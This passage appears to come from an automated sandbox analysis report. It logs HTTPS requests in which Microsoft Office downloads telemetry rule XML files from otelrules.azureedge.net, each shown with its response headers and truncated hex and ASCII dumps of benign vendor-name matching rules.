                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                        x-ms-request-id: c42a731b-b01e-0098-7820-3dcead000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011341Z-178bfbc474btrnf9hC1NYCb80g00000005cg00000000cszr
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:42 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        51192.168.2.54977013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:41 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:42 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                        x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011342Z-178bfbc474bpnd5vhC1NYC4vr4000000054000000000nzyp
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:42 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        52192.168.2.54976913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:41 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:42 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                        x-ms-request-id: eb55dd92-f01e-0020-3d6a-3c956b000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011342Z-174c587ffdfdwxdvhC1TEB1c4n00000003qg0000000068nt
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:42 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        53192.168.2.54977113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:42 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:42 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                        x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011342Z-178bfbc474bscnbchC1NYCe7eg00000005bg00000000dte0
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:42 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        54192.168.2.54977213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:42 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:42 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                        x-ms-request-id: 9177d9ad-001e-0028-350e-3dc49f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011342Z-178bfbc474bw8bwphC1NYC38b4000000055g000000002vz8
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:42 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        55192.168.2.54977613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:43 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:44 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                        x-ms-request-id: b70f59bb-c01e-0079-1f91-3de51a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011344Z-178bfbc474b9fdhphC1NYCac0n000000057g0000000050d4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:44 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        56192.168.2.54977813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:44 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:44 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                        x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011344Z-174c587ffdfp4vpjhC1TEBybqw00000003ng00000000nvv9
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:44 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        57192.168.2.54977913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:44 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:44 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                        x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011344Z-174c587ffdfb74xqhC1TEBhabc00000003q000000000etk4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:44 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        58192.168.2.54978013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:44 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:44 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                        x-ms-request-id: 7fefabc9-101e-000b-0f11-3d5e5c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011344Z-178bfbc474bh5zbqhC1NYCkdug0000000590000000001d29
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        59192.168.2.54978113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:44 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:44 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                        x-ms-request-id: 40c83c0a-001e-00ad-1e79-3b554b000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011344Z-174c587ffdftv9hphC1TEBm29w00000003p000000000bg62
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:44 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        60192.168.2.54978423.195.62.26443
